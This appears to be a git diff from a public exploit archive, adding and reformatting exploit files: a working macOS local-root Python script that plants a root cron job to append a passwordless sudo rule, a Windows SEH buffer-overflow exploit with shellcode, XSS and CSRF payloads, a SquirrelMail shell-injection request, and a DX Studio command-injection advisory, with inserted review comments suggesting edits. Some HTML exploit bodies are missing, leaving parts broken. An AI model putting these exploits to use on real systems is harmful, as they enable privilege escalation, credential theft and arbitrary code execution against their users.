diff --git a/platforms/multiple/remote/22138.c b/platforms/multiple/remote/22138.c index 23dc249ac..6e412152b 100755 --- a/platforms/multiple/remote/22138.c +++ b/platforms/multiple/remote/22138.c @@ -1,10 +1,10 @@ -source: http://www.securityfocus.com/bid/6575/info +// source: http://www.securityfocus.com/bid/6575/info -The Half-Life StatsMe plug-in is prone to an exploitable buffer overflow condition. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process. +// The Half-Life StatsMe plug-in is prone to an exploitable buffer overflow condition. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process. -Exploitation may be dependant on which other plug-ins are running on the Half-Life server. +// Exploitation may be dependant on which other plug-ins are running on the Half-Life server. -Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server. +// Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server. /***************************************************************** * hoagie_statsme.c diff --git a/platforms/multiple/remote/22139.c b/platforms/multiple/remote/22139.c index 5f5f0f9b2..74278d3aa 100755 --- a/platforms/multiple/remote/22139.c +++ b/platforms/multiple/remote/22139.c 
@@ -1,8 +1,8 @@ -source: http://www.securityfocus.com/bid/6577/info +//source: http://www.securityfocus.com/bid/6577/info -A format string vulnerability has been discovered in the Half-Life ClanMod plugin. The problem occurs in the 'cm_log' command which is designed to write a message to the server log file. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory. +// A format string vulnerability has been discovered in the Half-Life ClanMod plugin. The problem occurs in the 'cm_log' command which is designed to write a message to the server log file. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory. -Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server. +// Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server. /***************************************************************** * hoagie_clanmod.c diff --git a/platforms/multiple/remote/22140.c b/platforms/multiple/remote/22140.c index b7283521f..941b895cb 100755 --- a/platforms/multiple/remote/22140.c +++ b/platforms/multiple/remote/22140.c 
@@ -1,10 +1,10 @@ -source: http://www.securityfocus.com/bid/6578/info +// source: http://www.securityfocus.com/bid/6578/info -The Half-Life StatsMe plug-in is prone to an exploitable format string vulnerability. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process. +// The Half-Life StatsMe plug-in is prone to an exploitable format string vulnerability. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process. -Exploitation may be dependant on which other plug-ins are running on the Half-Life server. +// Exploitation may be dependant on which other plug-ins are running on the Half-Life server. -Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server. +// Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server. /***************************************************************** * hoagie_statsme.c diff --git a/platforms/osx/local/38371.py b/platforms/osx/local/38371.py new file mode 100755 index 000000000..93fd9a1e5 --- /dev/null +++ b/platforms/osx/local/38371.py 
@@ -0,0 +1,38 @@ +# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root +# tested on osx 10.9.5 / 10.10.5 +# jul/2015 +# by rebel + +import os,time,sys + +env = {} + +s = os.stat("/etc/sudoers").st_size + +env['MallocLogFile'] = '/etc/crontab' +env['MallocStackLogging'] = 'yes' +env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n' + +sys.stderr.write("creating /etc/crontab..") + +p = os.fork() +if p == 0: + os.close(1) + os.close(2) + os.execve("/usr/bin/rsh",["rsh","localhost"],env) + +time.sleep(1) + +if "NOPASSWD" not in open("/etc/crontab").read(): + sys.stderr.write("failed\n") + sys.exit(-1) + +sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..") + +while os.stat("/etc/sudoers").st_size == s: + sys.stderr.write(".") + time.sleep(1) + +sys.stderr.write("\ndone\n") + +os.system("sudo su") diff --git a/platforms/php/webapps/38372.html b/platforms/php/webapps/38372.html new file mode 100755 index 000000000..9dfcc654e --- /dev/null +++ b/platforms/php/webapps/38372.html @@ -0,0 +1,48 @@ +source: http://www.securityfocus.com/bid/58414/info + +Question2Answer is prone to a cross-site request-forgery vulnerability. + +Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. + +Question2Answer 1.5.4 is vulnerable; other versions may also be affected. + + + +Exploit for stealing admin's account in Question2Answer. Made by +MustLive. http://www.example.com + + + + + + diff --git a/platforms/php/webapps/38373.txt b/platforms/php/webapps/38373.txt new file mode 100755 index 000000000..d2a3dbbb1 --- /dev/null +++ b/platforms/php/webapps/38373.txt 
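Review bot: The header comment never states the persistent changes this PoC makes to the host: per its own messages and the env values, it creates `/etc/crontab` through `MallocLogFile` with a root cron entry, and that entry appends a `NOPASSWD` rule to `/etc/sudoers`; nothing in the script removes either, including on the `failed` exit path. A header line such as `# leaves /etc/crontab and an appended /etc/sudoers rule in place; restore both after testing` would let a tester return the machine to its original state, and those two files are the artifacts a defender would check for. Separately, `open("/etc/crontab").read()` never closes the file handle; `with open("/etc/crontab") as f:` is the usual form.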
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/58415/info + +The Terillion Reviews plugin for WordPress is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +">'> \ No newline at end of file diff --git a/platforms/php/webapps/38374.txt b/platforms/php/webapps/38374.txt new file mode 100755 index 000000000..64b8d6339 --- /dev/null +++ b/platforms/php/webapps/38374.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/58417/info + +SWFUpload is prone to multiple cross-site scripting and content spoofing vulnerabilities because it fails to sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. + +Content spoofing: + +http://www.example.com/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E + +Cross-site scripting: + +http://www.example.com/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E \ No newline at end of file diff --git a/platforms/php/webapps/38375.txt b/platforms/php/webapps/38375.txt new file mode 100755 index 000000000..6c8b9253d --- /dev/null +++ b/platforms/php/webapps/38375.txt 
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/58418/info + +Asteriskguru Queue Statistics is prone to an cross-site scripting vulnerability because it fails to sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/public/error.php?warning= \ No newline at end of file diff --git a/platforms/php/webapps/38376.txt b/platforms/php/webapps/38376.txt new file mode 100755 index 000000000..91607c0be --- /dev/null +++ b/platforms/php/webapps/38376.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/58421/info + +The podPress plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +podPress 8.8.10.13 is vulnerable; other versions may also be affected. + +http://www.example.com/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}// \ No newline at end of file diff --git a/platforms/php/webapps/38377.txt b/platforms/php/webapps/38377.txt new file mode 100755 index 000000000..c7955189e --- /dev/null +++ b/platforms/php/webapps/38377.txt 
@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/58425/info
+
+Privoxy is prone to multiple information-disclosure vulnerabilities.
+
+Attackers can exploit these issues to gain access to the user accounts and potentially obtain sensitive information. This may aid in further attacks.
+
+Privoxy 3.0.20 is affected; other versions may also be vulnerable.
+
+Response Code (current).: 407
+
+Response Headers (as seen by your browser).:
+
+HTTP/1.1 407 Proxy Authentication Required
+Date: Mon, 11 Mar 2013 17:01:59 GMT
+Server: ./msfcli auxiliary/server/capture/http set SRVPORT=80
+Proxy-Authenticate: Basic
+Vary: Accept-Encoding
+Content-Encoding: gzip
+Content-Length: 571
+Keep-Alive: timeout=15, max=99
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+Request Headers (as seen by the remote website)
+
+Host: c22.cc
+User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://www.example.com/
+Connection: keep-alive
diff --git a/platforms/php/webapps/4173.txt b/platforms/php/webapps/4173.txt
index 7d12808a8..05e903a7c 100755
--- a/platforms/php/webapps/4173.txt
+++ b/platforms/php/webapps/4173.txt
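Review bot: The prose never states what the information disclosure actually is, while the captured headers do: a remote origin (the `Server: ./msfcli auxiliary/server/capture/http` response) answered with `407 Proxy Authentication Required` and `Proxy-Authenticate: Basic`, and that challenge reached the browser through Privoxy. That suggests Privoxy relays an upstream server's proxy-authentication challenge unchanged, so the browser would prompt for the user's proxy credentials and send them in a `Proxy-Authorization` header to the attacker-controlled site — presumably the credential leak that "gain access to the user accounts" refers to. Suggest adding one sentence stating that mechanism and, if confirmed, noting that the mitigation is for the proxy to strip `Proxy-Authenticate` challenges originating from remote servers rather than from a configured forwarding proxy. "Response Code (current).:" also reads as a capture artifact; `Response code: 407` would be clearer.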
@@ -1,50 +1,50 @@ -SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability - -Bugtraq ID: 24782 - ------------------------------ - -There are various vulnerabilities in this software! One is in -keyring_main.php! -$fpr is not escaped from shellcommands! - -testbox:/home/w00t# cat /tmp/w00t -cat: /tmp/w00t: No such file or directory -testbox:/home/w00t# - -***@silverlaptop:~$ nc *** 80 -POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1 -Host: *** -User-Agent: w00t -Keep-Alive: 300 -Connection: keep-alive -Cookie: Authentication Data for SquirrelMail -Content-Type: application/x-www-form-urlencoded -Content-Length: 140 - -id=C5B1611B8E71C***&fpr= | touch /tmp/w00t | -&pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1 - -... - -testbox:/home/w00t# cat /tmp/w00t -testbox:/home/w00t# - -So we just executed 'touch /tmp/w00t'! - -WabiSabiLabi tries to sell the exploit for 700 Euro! ;) -lol @ WabiSabiLabi! - -Greets: - -oli and all members of jmp-esp! - - -jmp-esp is looking for people who are interested in IT security! -Currently we are looking for people who like to write articles for a -German ezine or are interested in exchanging informations, exploits... - -IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl) - #main - -# milw0rm.com [2007-07-11] +SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability + +Bugtraq ID: 24782 + +----------------------------- + +There are various vulnerabilities in this software! One is in +keyring_main.php! +$fpr is not escaped from shellcommands! 
+ +testbox:/home/w00t# cat /tmp/w00t +cat: /tmp/w00t: No such file or directory +testbox:/home/w00t# + +***@silverlaptop:~$ nc *** 80 +POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1 +Host: *** +User-Agent: w00t +Keep-Alive: 300 +Connection: keep-alive +Cookie: Authentication Data for SquirrelMail +Content-Type: application/x-www-form-urlencoded +Content-Length: 140 + +id=C5B1611B8E71C***&fpr= | touch /tmp/w00t | +&pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1 + +... + +testbox:/home/w00t# cat /tmp/w00t +testbox:/home/w00t# + +So we just executed 'touch /tmp/w00t'! + +WabiSabiLabi tries to sell the exploit for 700 Euro! ;) +lol @ WabiSabiLabi! + +Greets: + +oli and all members of jmp-esp! + + +jmp-esp is looking for people who are interested in IT security! +Currently we are looking for people who like to write articles for a +German ezine or are interested in exchanging informations, exploits... + +IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl) + #main + +# milw0rm.com [2007-07-11] diff --git a/platforms/php/webapps/5417.htm b/platforms/php/webapps/5417.htm index 6c77b805e..7296520ec 100755 --- a/platforms/php/webapps/5417.htm +++ b/platforms/php/webapps/5417.htm @@ -1,58 +1,58 @@ - - - -Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit - - - - - -
- -

Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit

- -

-
- Target:[http://[target]/[directory] -   -

-

-
-


- -

- -bd0rk

-
- - - - -# milw0rm.com [2008-04-09] + + + +Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit + + + + + +
+ +

Fishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit

+ +

+
+ Target:[http://[target]/[directory] +   +

+

+
+


+ +

+ +bd0rk

+
+ + + + +# milw0rm.com [2008-04-09] diff --git a/platforms/php/webapps/8965.txt b/platforms/php/webapps/8965.txt index b9aa017d7..50bb203e7 100755 --- a/platforms/php/webapps/8965.txt +++ b/platforms/php/webapps/8965.txt @@ -1,38 +1,38 @@ -vBulletin Radio and TV Player Add-On (all version) - XSS , Iframe injection and Redirect Vulnerability - -About:- - -Radio and TV Add-on will add a radio and TV library to your forum. - -Features:- - -- Users can add / delete / edit own stations - -For more info about this plugin See - http://www.vbulletin.org/forum/showthread.php?t=152037&page=2 - -Note:- - -- To exploit this Bug need to be registred!and after you are registered you can add new radio station - where name station can be "> - and URL "> - - -Poc: XSS - -http://www.musicadigitale.net/forum/radioandtv.php?station=92 - -Poc: Iframe - -http://www.musicadigitale.net/forum/radioandtv.php?station=93 - -Poc: Redirect - -http://www.musicadigitale.net/forum/radioandtv.php?station=94 - -dorks:- inurl:radioandtv.php - -Bug founded by d3v1l [Avram Marius] - -Date: 14.06.2009 - -# milw0rm.com [2009-06-15] +vBulletin Radio and TV Player Add-On (all version) - XSS , Iframe injection and Redirect Vulnerability + +About:- + +Radio and TV Add-on will add a radio and TV library to your forum. + +Features:- + +- Users can add / delete / edit own stations + +For more info about this plugin See - http://www.vbulletin.org/forum/showthread.php?t=152037&page=2 + +Note:- + +- To exploit this Bug need to be registred!and after you are registered you can add new radio station + where name station can be "> + and URL "> + + +Poc: XSS + +http://www.musicadigitale.net/forum/radioandtv.php?station=92 + +Poc: Iframe + +http://www.musicadigitale.net/forum/radioandtv.php?station=93 + +Poc: Redirect + +http://www.musicadigitale.net/forum/radioandtv.php?station=94 + +dorks:- inurl:radioandtv.php + +Bug founded by d3v1l [Avram Marius] + +Date: 14.06.2009 + +# milw0rm.com [2009-06-15] 
diff --git a/platforms/windows/dos/3430.html b/platforms/windows/dos/3430.html index ed705a5da..b61f430e7 100755 --- a/platforms/windows/dos/3430.html +++ b/platforms/windows/dos/3430.html @@ -1,72 +1,72 @@ - - - - -# milw0rm.com [2007-03-08] + + + + +# milw0rm.com [2007-03-08] diff --git a/platforms/windows/local/38362.py b/platforms/windows/local/38362.py index 68ea7b423..46890dd18 100755 --- a/platforms/windows/local/38362.py +++ b/platforms/windows/local/38362.py @@ -16,7 +16,7 @@ freeextractor.sourceforge.net/FreeExtractor/MakeSFX.exe Vulnerable Product: ================================================== -MakeSFX.exe v1.44 +MakeSFX.exe v1.44 Mar 19 2001 & Dec 10 2009 versions 
@@ -47,20 +47,14 @@ makesfx.exe /zip="source.zip" /sfx="output.exe" [/title="Your Title"] etc... -The '/title' argument when supplied an overly long payload will overwrite -NSEH & SEH exception handlers -causing buffer overflow, we can then execute our aribitrary shellcode. I -have seen some applications using -MakeSFX.exe from .bat files for some automation purposes, if the local .bat -file is replaced by malicious +The '/title' argument when supplied an overly long payload will overwrite NSEH & SEH exception handlers +causing buffer overflow, we can then execute our aribitrary shellcode. I have seen some applications using +MakeSFX.exe from .bat files for some automation purposes, if the local .bat file is replaced by malicious one attackers can cause mayhem on the system. -Both versions from 2001 & 2009 are vulnerable but exploit setup will be off -by 20 bytes. -punksnotdead="A"*1078+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX -v1.44 (Dec 10 2009) -punksnotdead="A"*1158+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX -v1.44 (Mar 19 2001) +Both versions from 2001 & 2009 are vulnerable but exploit setup will be off by 80 bytes. +punksnotdead="/title"+"A"*1078+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Dec 10 2009) +punksnotdead="/title"+"A"*1158+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Mar 19 2001) POC exploit code(s): @@ -68,10 +62,8 @@ POC exploit code(s): We will exploit MakeSFX v1.44 (Mar 19 2001). -I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH, -Rebase all set to False, but it contains null 0x00. -So no suitable SEH instruction address avail, I will instead have to use -mona.py to look for POP,POP,RET instruction +I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH, Rebase all set to False, but it contains null 0x00. +So no suitable SEH instruction address avail, I will instead have to use mona.py to look for POP,POP,RET instruction in outside modules and we find some... e.g. 
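Review bot: The rewritten `punksnotdead=` example lines reverse the order to `"BBBB"+"RRRR"` and change the offset difference to 80 bytes, but the trailing comment `#<---- SEH Handler control` still does not say which four bytes land in nSEH and which in the SEH handler, so the order change reads as arbitrary; suggest `# "BBBB" overwrites nSEH, "RRRR" overwrites the SEH handler` (the 80-byte figure itself is consistent with 1158 − 1078, and nSEH-before-handler matches the `nseh=`/`seh=` assignments later in the file). The new `"/title"` prefix also differs from the usage line quoted in the hunk header, `/title="Your Title"`, which has an `=`; if MakeSFX expects `/title=`, the example should match the argument string the exploit actually builds, which is outside this hunk. The surrounding description block starts before and continues after this hunk.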
@@ -102,7 +94,7 @@ sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" nseh="\xEB\x06"+"\x90"*2 seh=struct.pack(' - - - - - - - - - - - - - - - - - -- -----------/ - -Note: The security vulnerability is also exploitable on the standalone -player, however, this functionality appears to be the expected behavior -and fully intended for the standalone player. - - -9. *Report Timeline* - -. 2009-05-21: -Core Security Technologies notifies the Worldweaver Support Team (WST) -of the vulnerability and announces its initial plan to publish the -content on June 15th, 2009. - -. 2009-05-26: -The WST asks Core for a technical description of the vulnerability. - -. 2009-05-26: -Technical details sent to WST by Core. - -. 2009-06-08: -Core asks WST for an estimated date to fix this issue. - -. 2009-06-08: -WST notifies Core that a fix has already been produced and it is -available to the users. - -. 2009-06-09: -The advisory CORE-2009-0521 is published. - - -10. *References* - -[1] http://www.dxstudio.com. -[2] http://www.dxstudio.com/download2.aspx. -[3] -http://www.dxstudio.com/forumtopic.aspx?topicid=b4152459-fb5f-4933-b700-b3fbd54f6bfd - - -11. *About CoreLabs* - -CoreLabs, the research center of Core Security Technologies, is charged -with anticipating the future needs and requirements for information -security technologies. We conduct our research in several important -areas of computer security including system vulnerabilities, cyber -attack planning and simulation, source code auditing, and cryptography. -Our results include problem formalization, identification of -vulnerabilities, novel solutions and prototypes for new technologies. -CoreLabs regularly publishes security advisories, technical papers, -project information and shared software tools for public use at: -http://www.coresecurity.com/corelabs. - - -12. 
*About Core Security Technologies* - -Core Security Technologies develops strategic solutions that help -security-conscious organizations worldwide develop and maintain a -proactive process for securing their networks. The company's flagship -product, CORE IMPACT, is the most comprehensive product for performing -enterprise security assurance testing. CORE IMPACT evaluates network, -endpoint and end-user vulnerabilities and identifies what resources are -exposed. It enables organizations to determine if current security -investments are detecting and preventing attacks. Core Security -Technologies augments its leading technology solution with world-class -security consulting services, including penetration testing and software -security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core -Security Technologies can be reached at 617-399-6980 or on the Web at -http://www.coresecurity.com. - - -13. *Disclaimer* - -The contents of this advisory are copyright (c) 2009 Core Security -Technologies and (c) 2009 CoreLabs, and may be distributed freely -provided that no fee is charged for this distribution and proper credit -is given. - - -14. *PGP/GPG Keys* - -This advisory has been signed with the GPG key of Core Security -Technologies advisories team, which is available for download at -http://www.coresecurity.com/files/attachments/core_security_advisories.asc. ------BEGIN PGP SIGNATURE----- -Version: GnuPG v1.4.7 (MingW32) -Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org - -iD8DBQFKLtHJyNibggitWa0RAlq1AJ0cZPpDqReJWHd0toN7tnTFLVA99gCgiG/Q -PMPteYbShbRU4j4tIk93HPM= -=Mx5G ------END PGP SIGNATURE----- - -# milw0rm.com [2009-06-10] +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + + Core Security Technologies - CoreLabs Advisory + http://www.coresecurity.com/corelabs/ + + DX Studio Player Firefox plug-in command injection + + + +1. 
*Advisory Information* + +Title: DX Studio Player Firefox plug-in command injection +Advisory ID: CORE-2009-0521 +Advisory URL: +http://www.coresecurity.com/content/DXStudio-player-firefox-plugin +Date published: 2009-06-09 +Date of last update: 2009-06-09 +Vendors contacted: Worldweaver +Release mode: Coordinated release + + +2. *Vulnerability Information* + +Class: Command injection +Remotely Exploitable: Yes +Locally Exploitable: No +Bugtraq ID: N/A +CVE Name: CVE-2009-2011 + + +3. *Vulnerability Description* + +DX Studio [1] is a complete integrated development environment for +creating interactive 3D graphics. DX Studio Player plug-in for Firefox +[2] is vulnerable to a remote command execution vulnerability. + + +4. *Vulnerable packages* + + . DX Studio Player v3.0.29.0 + . DX Studio Player v3.0.22.0 + . DX Studio Player v3.0.12.0 + . Older versions are probably affected too, but they were not checked. + + +5. *Non-vulnerable packages* + + . DX Studio Player v3.0.29.1 + + +6. *Vendor Information, Solutions and Workarounds* + +On June 1st DXStudio team patched the current release 3.0.29 to 3.0.29.1 +for all new downloads to fix the problem with the Firefox plugin, and +also posted a sticky announce for all its users [3]. + + +7. *Credits* + +This vulnerability was discovered and researched by Diego Juarez from +Core Security Technologies. + + +8. *Technical Description / Proof of Concept Code* + +DX Studio is a complete integrated development environment for creating +interactive 3D graphics. DX Studio provides a javascript API in which +the method 'shell.execute()' is defined as follows: + +/----------- + +Prototype: +shell.execute(commandString, [paramString], [commandIsProgId]); + +- -----------/ + +This method sends the 'commandString' to the Windows shell with optional +parameters in 'paramString'. For security reasons, this function is not +available when running in a web browser. 
If you set 'commandIsProgId' to +true, you can launch a utility by its 'ProgID', e.g. 'WMP.DVD' with +parameter 'play' would play a DVD in Windows Media Player. + +In our tests, despite what is stated in the documentation, we found that +the function is actually available to both the Internet Explorer and +Firefox browser plug-ins. In the IE plug-in the user does get a warning +about the security implications of allowing such '.dxstudio' file to +run. On Firefox however, there is no such warning whatsoever, allowing +an attacker to execute arbitrary code on the client side by luring the +victim into clicking a link or visiting a malicious website. + + +8.1. *Proof of Concept (header.xml)* + +/----------- + + + + + + + + + + + + + + + + + + + +- -----------/ + +Note: The security vulnerability is also exploitable on the standalone +player, however, this functionality appears to be the expected behavior +and fully intended for the standalone player. + + +9. *Report Timeline* + +. 2009-05-21: +Core Security Technologies notifies the Worldweaver Support Team (WST) +of the vulnerability and announces its initial plan to publish the +content on June 15th, 2009. + +. 2009-05-26: +The WST asks Core for a technical description of the vulnerability. + +. 2009-05-26: +Technical details sent to WST by Core. + +. 2009-06-08: +Core asks WST for an estimated date to fix this issue. + +. 2009-06-08: +WST notifies Core that a fix has already been produced and it is +available to the users. + +. 2009-06-09: +The advisory CORE-2009-0521 is published. + + +10. *References* + +[1] http://www.dxstudio.com. +[2] http://www.dxstudio.com/download2.aspx. +[3] +http://www.dxstudio.com/forumtopic.aspx?topicid=b4152459-fb5f-4933-b700-b3fbd54f6bfd + + +11. *About CoreLabs* + +CoreLabs, the research center of Core Security Technologies, is charged +with anticipating the future needs and requirements for information +security technologies. 
We conduct our research in several important +areas of computer security including system vulnerabilities, cyber +attack planning and simulation, source code auditing, and cryptography. +Our results include problem formalization, identification of +vulnerabilities, novel solutions and prototypes for new technologies. +CoreLabs regularly publishes security advisories, technical papers, +project information and shared software tools for public use at: +http://www.coresecurity.com/corelabs. + + +12. *About Core Security Technologies* + +Core Security Technologies develops strategic solutions that help +security-conscious organizations worldwide develop and maintain a +proactive process for securing their networks. The company's flagship +product, CORE IMPACT, is the most comprehensive product for performing +enterprise security assurance testing. CORE IMPACT evaluates network, +endpoint and end-user vulnerabilities and identifies what resources are +exposed. It enables organizations to determine if current security +investments are detecting and preventing attacks. Core Security +Technologies augments its leading technology solution with world-class +security consulting services, including penetration testing and software +security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core +Security Technologies can be reached at 617-399-6980 or on the Web at +http://www.coresecurity.com. + + +13. *Disclaimer* + +The contents of this advisory are copyright (c) 2009 Core Security +Technologies and (c) 2009 CoreLabs, and may be distributed freely +provided that no fee is charged for this distribution and proper credit +is given. + + +14. *PGP/GPG Keys* + +This advisory has been signed with the GPG key of Core Security +Technologies advisories team, which is available for download at +http://www.coresecurity.com/files/attachments/core_security_advisories.asc. 
+-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.7 (MingW32) +Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org + +iD8DBQFKLtHJyNibggitWa0RAlq1AJ0cZPpDqReJWHd0toN7tnTFLVA99gCgiG/Q +PMPteYbShbRU4j4tIk93HPM= +=Mx5G +-----END PGP SIGNATURE----- + +# milw0rm.com [2009-06-10]